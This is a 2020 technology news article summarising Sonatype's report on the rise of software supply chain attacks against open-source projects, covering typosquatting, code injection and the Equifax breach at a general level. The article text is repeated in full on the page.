Developers
September 14, 2020

2020 State of the Software Supply Chain: Open Source Software in the Crosshairs

The past 12 months have seen a massive increase in cyberattacks against open-source software.

Open-source software has traditionally been known for being secure, often more secure than closed source software. Much of this is because of the number of people looking at and tinkering with the underlying code. The more people look at it, the greater the chance of finding bugs and security issues before the software goes into production.

In recent years, however, open-source has increasingly been a prime target for hackers and bad actors. One of the most popular types of attacks is a supply chain attack.

Sonatype has just released its 2020 State of the Software Supply Chain, and the message is clear: It’s open season on open-source software.

What Is a Supply Chain Attack

Supply chain attacks are the holy grail of hacks. There are two types of supply chain attacks: legacy and next-generation attacks.

Legacy supply chain attacks involve exploiting a vulnerability in the software a company relies on, including open source components. Once a vulnerability is discovered, all software using that component can be compromised. As Sonatype’s report highlights, this type of attack is what lead to the infamous Equifax breach.

Following public disclosure from the Apache Foundation pertaining to a severe vulnerability in the popular Struts2 Framework, adversaries sprang into action and began exploiting the newly-known defect within 72 hours, well before many commercial IT teams (including Equifax) could respond and update their frameworks. This remarkably small window to respond led to numerous high-profile breaches, including Canada Statistics, Canada Revenue, the GMO Payment Gateway, Okinawa Power, Japan Post, India Post, and India’s AADHAAR digital identification system.

As effective, and terrifying, as this legacy type of supply chain attack maybe, the next generation variation is far worse. With this kind of attack, rather than waiting for a vulnerability to be disclosed, hackers gain access to a company’s software development pipeline or supply chain. Once they have gained access, they can introduce a backdoor, virus, or other kinds of malware. From that point, any software the company ships can contain the introduced vulnerability. Because the software comes from a trusted source, customers have little to no reason to suspect a potential problem until it’s too late.

One of the most popular methods of carrying out a next-generation supply chain attack is through software repositories, as evidenced by Sonatype’s report:

According to security researchers at the University of Bonn, SAP Labs France, and Fraunhofer FKIE, “From an attacker’s point of view, [large scale, public internet-based] package repositories represent a reliable and scalable malware distribution channel. Thus far, Node.js (npm) and Python (PyPI) repositories have been the primary targets of malicious packages, supposedly due to the fact that malicious code can be easily triggered during package installation.”

Next-generation software supply chain attacks are possible for three reasons:

1.    Open source projects rely on contributions from thousands of volunteer developers, and discriminating between community members with good or malicious intent is difficult, if not impossible.

2. Open source projects themselves typically incorporate hundreds — if not thousands —of dependencies from other open-source projects, which may contain known vulnerabilities. While some open source projects demonstrate exemplary hygiene as measured by mean time to remediate (MTTR) and mean time to update (MTTU), many others do not (see Chapter 3). The sheer volume of open source in use and the massive number of dependencies makes it difficult to quickly evaluate the quality and security of every new version of a dependency.

3. The ethos of open source is built on “shared trust” between a global community of individuals, which creates a fertile environment whereby bad actors can prey upon good people with surprising ease.

To make matters even worse, the Linux Foundation’s Core Infrastructure Initiative found that 7 of the top 10 most-used software packages were hosted on an individual developer’s account. Each of these individual accounts represents a significant security risk and raises a host of questions about the integrity of the software supply chain. Most critically, would there be any reliable way of knowing downstream if the packages on one of these accounts were hacked?

The Growing Threat and the Solution

Sonatype’s researchers found that, over the last 12 months, there has been a 430% year-over-year growth in supply chain attacks. There are a couple of ways these attacks are carried out.

Typosquatting is one of the most popular. With this kind of attack, a hacker creates a malicious component that has a similar name to a popular, legitimate component. If a developer mistypes the name of the component they’re looking for, they may accidentally install the malicious component instead.

The second line of attack is direct malicious code injection. This kind of attack relies on a hacker gaining direct access to a company’s code repository. This may be done by hacking a developer or project manager’s computer to gain access. It may involve some degree of social engineering. Whatever the method used, once the hacker gains access to the source code, there’s virtually no limit to the kind of damage they can cause.

While there is little most companies can do to completely prevent these kind of attacks, especially upstream, Sonatype recommends companies adopt a “rapid upgrade posture.” This will enable companies to respond quickly to exploits, whether they are traditional or next-generation supply chain attacks.

Conclusion

Without a doubt, open-source software is in the crosshairs and supply chain attacks are on the rise. By having a security-first approach and a rapid upgrade posture, companies can mitigate much of the potential damage.

TagsSupply ChainOpen Source SoftwareCyberattacks
Matt Milano
Technical Writer
Matt is a tech journalist and writer with a background in web and software development.

Related Articles

Back
DevelopersSeptember 14, 2020
2020 State of the Software Supply Chain: Open Source Software in the Crosshairs
The past 12 months have seen a massive increase in cyberattacks against open-source software.

Open-source software has traditionally been known for being secure, often more secure than closed source software. Much of this is because of the number of people looking at and tinkering with the underlying code. The more people look at it, the greater the chance of finding bugs and security issues before the software goes into production.

In recent years, however, open-source has increasingly been a prime target for hackers and bad actors. One of the most popular types of attacks is a supply chain attack.

Sonatype has just released its 2020 State of the Software Supply Chain, and the message is clear: It’s open season on open-source software.

What Is a Supply Chain Attack

Supply chain attacks are the holy grail of hacks. There are two types of supply chain attacks: legacy and next-generation attacks.

Legacy supply chain attacks involve exploiting a vulnerability in the software a company relies on, including open source components. Once a vulnerability is discovered, all software using that component can be compromised. As Sonatype’s report highlights, this type of attack is what lead to the infamous Equifax breach.

Following public disclosure from the Apache Foundation pertaining to a severe vulnerability in the popular Struts2 Framework, adversaries sprang into action and began exploiting the newly-known defect within 72 hours, well before many commercial IT teams (including Equifax) could respond and update their frameworks. This remarkably small window to respond led to numerous high-profile breaches, including Canada Statistics, Canada Revenue, the GMO Payment Gateway, Okinawa Power, Japan Post, India Post, and India’s AADHAAR digital identification system.

As effective, and terrifying, as this legacy type of supply chain attack maybe, the next generation variation is far worse. With this kind of attack, rather than waiting for a vulnerability to be disclosed, hackers gain access to a company’s software development pipeline or supply chain. Once they have gained access, they can introduce a backdoor, virus, or other kinds of malware. From that point, any software the company ships can contain the introduced vulnerability. Because the software comes from a trusted source, customers have little to no reason to suspect a potential problem until it’s too late.

One of the most popular methods of carrying out a next-generation supply chain attack is through software repositories, as evidenced by Sonatype’s report:

According to security researchers at the University of Bonn, SAP Labs France, and Fraunhofer FKIE, “From an attacker’s point of view, [large scale, public internet-based] package repositories represent a reliable and scalable malware distribution channel. Thus far, Node.js (npm) and Python (PyPI) repositories have been the primary targets of malicious packages, supposedly due to the fact that malicious code can be easily triggered during package installation.”

Next-generation software supply chain attacks are possible for three reasons:

1.    Open source projects rely on contributions from thousands of volunteer developers, and discriminating between community members with good or malicious intent is difficult, if not impossible.

2. Open source projects themselves typically incorporate hundreds — if not thousands —of dependencies from other open-source projects, which may contain known vulnerabilities. While some open source projects demonstrate exemplary hygiene as measured by mean time to remediate (MTTR) and mean time to update (MTTU), many others do not (see Chapter 3). The sheer volume of open source in use and the massive number of dependencies makes it difficult to quickly evaluate the quality and security of every new version of a dependency.

3. The ethos of open source is built on “shared trust” between a global community of individuals, which creates a fertile environment whereby bad actors can prey upon good people with surprising ease.

To make matters even worse, the Linux Foundation’s Core Infrastructure Initiative found that 7 of the top 10 most-used software packages were hosted on an individual developer’s account. Each of these individual accounts represents a significant security risk and raises a host of questions about the integrity of the software supply chain. Most critically, would there be any reliable way of knowing downstream if the packages on one of these accounts were hacked?

The Growing Threat and the Solution

Sonatype’s researchers found that, over the last 12 months, there has been a 430% year-over-year growth in supply chain attacks. There are a couple of ways these attacks are carried out.

Typosquatting is one of the most popular. With this kind of attack, a hacker creates a malicious component that has a similar name to a popular, legitimate component. If a developer mistypes the name of the component they’re looking for, they may accidentally install the malicious component instead.

The second line of attack is direct malicious code injection. This kind of attack relies on a hacker gaining direct access to a company’s code repository. This may be done by hacking a developer or project manager’s computer to gain access. It may involve some degree of social engineering. Whatever the method used, once the hacker gains access to the source code, there’s virtually no limit to the kind of damage they can cause.

While there is little most companies can do to completely prevent these kind of attacks, especially upstream, Sonatype recommends companies adopt a “rapid upgrade posture.” This will enable companies to respond quickly to exploits, whether they are traditional or next-generation supply chain attacks.

Conclusion

Without a doubt, open-source software is in the crosshairs and supply chain attacks are on the rise. By having a security-first approach and a rapid upgrade posture, companies can mitigate much of the potential damage.

Supply Chain
Open Source Software
Cyberattacks
About the author
Matt Milano -Technical Writer
Matt is a tech journalist and writer with a background in web and software development.

Related Articles